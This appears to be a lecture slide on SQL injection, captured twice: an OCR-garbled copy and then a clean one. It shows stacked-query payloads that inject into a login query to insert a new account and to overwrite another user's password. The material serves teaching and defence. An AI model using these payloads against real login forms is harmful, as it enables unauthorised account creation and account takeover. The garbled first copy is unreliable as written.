All Queries are Possible in SQL Injection Insert record: SELECT FROM login WHERE 'user'=; INSERT INTO 'login'('user','pass')VALUES ('haxor','whatever); -'AND 'pass= Update record: SELECT FROM login WHERE 'user'="; UPDATE 'login'SET pass'=pass123'WHERE user='timbo317'; -AND 'pass'= 88 All Queries are Possible in SQL Injection Insert record: SELECT * FROM `login` WHERE `user`=‘’; INSERT INTO `login` ('user','pass') VALUES ('haxor','whatever'); --’ AND `pass`=‘’ Update record: SELECT * FROM `login` WHERE `user`=‘’; UPDATE `login` SET `pass`=‘pass123’ WHERE `user`=‘timbo317’; --’ AND `pass`=‘’